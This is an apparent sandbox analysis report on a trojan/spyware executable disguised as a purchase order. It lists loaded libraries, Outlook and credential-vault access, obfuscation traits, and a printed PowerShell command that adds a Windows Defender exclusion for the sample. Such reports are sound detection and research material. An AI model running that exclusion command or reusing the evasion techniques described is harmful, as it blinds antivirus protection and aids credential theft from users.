                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2045099806.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2051720668.0000000002A21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000000.00000002.2060019477.0000000008940000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3264163729.000000000042C000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe, 00000006.00000002.3264545224.0000000000EF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe | Binary or memory string: OriginalFilenameNnLj.exeL vs PURCHASE ORDER-6350-2024.exe
                        Source: PURCHASE ORDER-6350-2024.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PURCHASE ORDER-6350-2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, O.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, O.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3adde58.3.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.cs | Security API names: _0020.SetAccessControl
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.cs | Security API names: _0020.AddAccessRule
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.cs | Security API names: _0020.SetAccessControl
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.cs | Security API names: _0020.AddAccessRule
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, P3KWcgP03CKVL94tw3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, P3KWcgP03CKVL94tw3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/6@1/1
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASE ORDER-6350-2024.exe.log
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aa3ncavf.zhi.ps1
                        Source: PURCHASE ORDER-6350-2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PURCHASE ORDER-6350-2024.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: PURCHASE ORDER-6350-2024.exe | ReversingLabs: Detection: 21%
                        Source: PURCHASE ORDER-6350-2024.exe | String found in binary or memory: $72794fd6-9579-4364-adda-1580f4b1038b
                        Source: unknown | Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Process created: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: textshaping.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: version.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: vaultcli.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: PURCHASE ORDER-6350-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PURCHASE ORDER-6350-2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: PURCHASE ORDER-6350-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: NnLj.pdbSHA256 source: PURCHASE ORDER-6350-2024.exe
                        Source: Binary string: NnLj.pdb source: PURCHASE ORDER-6350-2024.exe

                        Data Obfuscation

                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.2b69bcc.1.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.cs.Net Code: MtQH1fVeKqYooKecnGf System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.3bfeaa0.2.raw.unpack, iv04pT1Nje59B37HvY.cs.Net Code: MtQH1fVeKqYooKecnGf System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.5620000.5.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PURCHASE ORDER-6350-2024.exe.2aa1a98.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                        Source: PURCHASE ORDER-6350-2024.exeStatic PE information: 0xC32C0DAC [Thu Oct 5 15:50:04 2073 UTC]
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DCD801 push es; ret 0_2_06DCD810
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DD5648 pushfd ; iretd 0_2_06DD56F9
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DD56F0 pushfd ; iretd 0_2_06DD56F9
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DDAE19 push eax; mov dword ptr [esp], edx 0_2_06DDAE2C
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DD5638 pushad ; iretd 0_2_06DD5639
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06DDCE30 push es; ret 0_2_06DDCE40
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 0_2_06E1DE48 push esp; ret 0_2_06E1DE49
Source: C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe | Code function: 6_2_0136F850 push es; ret 6_2_0136F860
(Sequences such as push es; ret, pushfd; iretd and pushad; iretd are not ordinary compiler output; they are junk-code / anti-disassembly patterns that break linear-sweep disassemblers. The entries are of the form <pid>_<run>_<address>, the last one coming from process 6, a second process that inherited the same code.)
Source: PURCHASE ORDER-6350-2024.exe | Static PE information: section name: .text entropy: 7.717897542519251 (close to the 8.0 maximum for byte data, consistent with compressed or encrypted content rather than plain compiled code in the code section)
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, L53jeqg7TU3usVYAQC.cs | High entropy of concatenated method names: 'av804Aq3dO', 'oPg0wsWmXc', 'iPh0inMgrG', 'm1H0BefjKc', 'veG0PnOHnK', 'ui20oeRsF6', 'jAH0vZC1xq', 'z5X0KWhxlE', 'f9M0uFZKDq', 'WpK0f30Yv6'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, s9YxdXpYvmj4sEtJwg.cs | High entropy of concatenated method names: 'HO1ZX0dFDv', 'i3BZ8prWVg', 'ToString', 'sRxZgSgPOe', 'lDJZjGiZuG', 'HgbZT43KMJ', 'zoWZbveHwY', 'KB1Zd2KZID', 'suQZOy0gHX', 'LgEZlEQ9U9'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, z8V6tSE9Kmk8VtHnQ3.cs | High entropy of concatenated method names: 'L5CdGnTvgO', 'B1qdjTHB0f', 'StGdb5CFl1', 'QTXdOyGcHV', 'Mbhdl9RtXq', 'MQebHF3Tss', 'RcAbsdgysV', 'yS1bLCMrSG', 'DL2ba6jfn3', 'QGdbCskcGG'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, F4KCalNgCf4yJJMxmi.cs | High entropy of concatenated method names: 'Dispose', 'twNcCypQt4', 'DafxBWJaWx', 'gPi77gulml', 'kHgcUuYmp0', 'BheczKE4aY', 'ProcessDialogKey', 'eaLxhP8s10', 'CnSxcYmxpC', 'bX5xxYUGmi'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, vP9haJacLPGwS8wXSo.cs | High entropy of concatenated method names: 'gPCOWRWtVk', 'lfgOrK9oJr', 'UIUOtL9dVg', 'LSmORlUOtj', 'wv7OVqjviB', 'CxQO6fGhUr', 'FeDOnNu062', 'fxsO4sQulE', 'bV8OwM5HIx', 'vbSOQiEOCC'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, IScEM5lWVrKlhRvUrx.cs | High entropy of concatenated method names: 'f8ScOHvsyX', 'CQMclHI8US', 'BGhcXUt12V', 'dBGc8wZ9V0', 'CvlcIcyqrA', 'dAucSPgoaM', 'TG85DLHDcuKtyVNtsE', 'vcZjHFlUJjecPQw7Qr', 'LQRccxpRSx', 'YE8c2pOpqN'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, kl5mmcflXMc65HWBwM.cs | High entropy of concatenated method names: 'z43ZaJ9ICd', 'MLqZUQGiTl', 'JTXyhUBsFF', 'g6YycB8J3W', 'yXQZfcO3pM', 'A2qZ9ylxBL', 'ueCZYEwZQV', 'qn0Z5nTE3R', 'LyLZe0C7Vu', 'C0fZJQkGX6'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, xjSqLJKLfArB0tpMCnq.cs | High entropy of concatenated method names: 'nmiDW2nTaS', 'sfiDrJEhwQ', 'Cn1DthvMD1', 'z6MDR33YNZ', 'EEyDVEGbo9', 'fKvD6tbi1S', 'Q4LDnVd7yr', 'O4ID4ancvc', 'FyIDwTOQrS', 'bfhDQjVN2v'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, FW07bIZxXrtNgWto45.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'M28xCk1chl', 'bqNxUJi5cj', 'WJJxzwRgaO', 'MbB2hbb01E', 'MkL2cbxg9c', 'D0o2x1DIOM', 'fd322XZAgl', 'UEtABwVANYrG79ytDCI'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, P3KWcgP03CKVL94tw3.cs | High entropy of concatenated method names: 'Ma7j5hJYxa', 'bg4jepGRwo', 'VJ3jJK1Tbv', 'cc2jMjpa1G', 'sI5jHbrttL', 'in9jsEXufZ', 'FdujLiQkKU', 'TsAja8hst3', 'JuTjCad4G4', 'HyFjUQAgur'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, gvDY8QB1YMmf2dncZA.cs | High entropy of concatenated method names: 'rmiTRqpWBA', 'bGQT6mDjw3', 'eAyT4lQquh', 't1dTw5SkW6', 'zSDTIv1EhE', 'mdMTSeNe5W', 'BVATZi9YXr', 'XseTyWURLl', 'yXrTD1SkeZ', 'K7KTFgtkVF'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, RgwcvmFYWkp0fMVSiK.cs | High entropy of concatenated method names: 's6Kygo7qZR', 'mPtyjV46c6', 'PgkyThw5Ku', 'CXEybHToy7', 'OkUydA6wws', 'nL5yOCChpk', 'lSOylIrOLn', 'J6Ayqx2RFb', 'rwcyXaT6yK', 'oI1y85gqsv'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, cmsXDtyGVO5FOEpadW.cs | High entropy of concatenated method names: 'efLDco7jCA', 'wZgD2xnuvK', 'P1QDNg6tUW', 'hF1DgYAUUC', 'wheDjVOWMF', 'YEBDb14kGl', 'oOODdaG1rr', 'vDMyL5MDrG', 'tG9yaiGFEV', 'FUxyC7dEp3'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, kBPjPwzFF5lF1uwwqm.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'b5AD06pxfl', 'dIfDIWQacJ', 'slDDSSAeEk', 'BhIDZNXPn3', 'TyiDy3dtBm', 'NodDDhcuZe', 'vqfDFF7Mel'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, ImIW4rKwf6tqNiiWNR3.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'c0xF5Pr4bY', 'cqkFeDi4OX', 'bPBFJvpMuD', 'mpOFMkQjyO', 'moiFH6fUNQ', 'c3YFsfO2uY', 'ECOFLOpiyw'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, iv04pT1Nje59B37HvY.cs | High entropy of concatenated method names: 'ImZ2Gx7xyZ', 'RqZ2gZFOMD', 'BjJ2jWuEDe', 'NG62TlLE7c', 'tEJ2b8N6le', 'tQu2drm0Ru', 'SIA2OPIVdm', 'Ekw2l5WILM', 'vle2qHvAuh', 'ziC2Xod8tV'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, l8ftM6oDY7WIIMNLOd.cs | High entropy of concatenated method names: 'C18bVSpGsQ', 'CNObnY7IF2', 'tC7Tm9QOhW', 'fnkTPZsumm', 'z4eToIHZWL', 'e4STAwWcnm', 'DovTvBY7nj', 'a80TKIynWT', 'gaLTppPsyK', 'mROTugtnN8'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, dyrVmPctQktPSrtNdw.cs | High entropy of concatenated method names: 'nXmOgoV2AG', 's4KOTERE7X', 'GLIOdu3IKS', 'qhCdUwvk9e', 'L7jdzOspfT', 'JbbOhtbYGT', 'TofOcBy4yc', 'D9SOx8X0D6', 'F23O21R0Qg', 'BWtONPaY0P'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, l2sJYh5K0ZNHRqvmDU.cs | High entropy of concatenated method names: 'e5vtvaU5e', 'L4qRU9qOW', 'flx6D0bih', 'B0GnhQH2d', 'g19wjoHRy', 'NGKQs9iho', 'N7eC3GKT6wBmVGvXic', 'a77CdxkuZemMFuw3Hk', 'nvQyVgcJY', 'KStFRUg8A'
Source: 0.2.PURCHASE ORDER-6350-2024.exe.8940000.6.raw.unpack, Qrig4VQZJw0SmAOp59.cs | High entropy of concatenated method names: 'be1Iuvnh8E', 'ki1I95fAFH', 'Q2xI5IFFIN', 'gnCIeRwoYG', 'WGFIBrbBjn', 'dXvImN6VJC', 'GfsIPFS2SZ', 'IN2IoimUxq', 'KoLIAwrg6T', 'ejEIv7tweD'
